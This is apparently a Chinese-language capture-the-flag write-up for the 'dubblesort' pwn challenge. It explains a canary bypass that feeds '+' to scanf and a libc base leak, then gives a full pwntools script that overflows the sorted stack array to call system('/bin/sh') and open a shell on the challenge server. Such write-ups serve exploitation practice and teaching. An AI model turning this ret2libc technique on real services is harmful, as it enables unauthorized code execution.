这个题目很好玩
看起来就是一个 排序的程序
然后这个题实际上也是一个 关于排序的程序
参考链接
https://bbs.pediy.com/thread-228226.htm
这里没有想到的点就是怎么看找加载基址的 没有想到 可以通过哪里看得到
还是对pwn的地址太敏感
如果把加载地址给解决了 这个题目就很好办了
看一下程序
这里面的 排序很好看出来是冒泡排序
然后 看一下 有什么保护
基本保护全开了 ,。
然后 因为这里我们要用到栈溢出 所以要关心一下 这个 canary怎么绕过
这里 可以用 "+" 来绕过
因为 scanf 里面 会认为+8还是8
这两点确定了 其它就很好说了 只需要 排完的栈还能rop 就行
就是这里的 看偏移就可以了
这个题不算难
下面是exp
#coding:utf-8
from pwn import *
#io=remote("111.198.29.45",31926)
locall=1
if locall:
io=process("./dubblesort")
else:
io=remote("111.198.29.45",59084)
#111.198.29.45:43355
# 111.198.29.45:31926
elf=ELF("./dubblesort")
libc=ELF("/lib/i386-linux-gnu/libc-2.23.so")
def wirte_number(number):
io.recvuntil("number : ")
io.sendline(str(number))
if __name__=="__main__":
io.recvuntil("What your name :")
io.send("1"*28)
io.recvuntil("1"*28)
libc_base_addr=u32(io.recv(4))
#gdb.attach(io)
log.success('libc_base addr : 0x%x'%libc_base_addr)
libc_base_addr=libc_base_addr-0x1b0244
log.success('libc_base addr : 0x%x'%libc_base_addr)
#gdb.attach(io)
system_addr = libc_base_addr + libc.symbols['system']
binsh_addr = libc_base_addr + libc.search('/bin/sh\x00').next()
log.success('system addr : 0x%x'%system_addr)
log.success('binsh addr : 0x%x'%binsh_addr)
io.recvuntil("How many numbers do you what to sort :")
io.sendline("35")
for i in range(24):
wirte_number(str(0))
wirte_number("+")
#gdb.attach(io)
for i in range(9):
wirte_number(str(system_addr))
#gdb.attach(io)
#pause()
#raw_input()
wirte_number(str(binsh_addr))
print io.recv()
io.interactive()
io.close()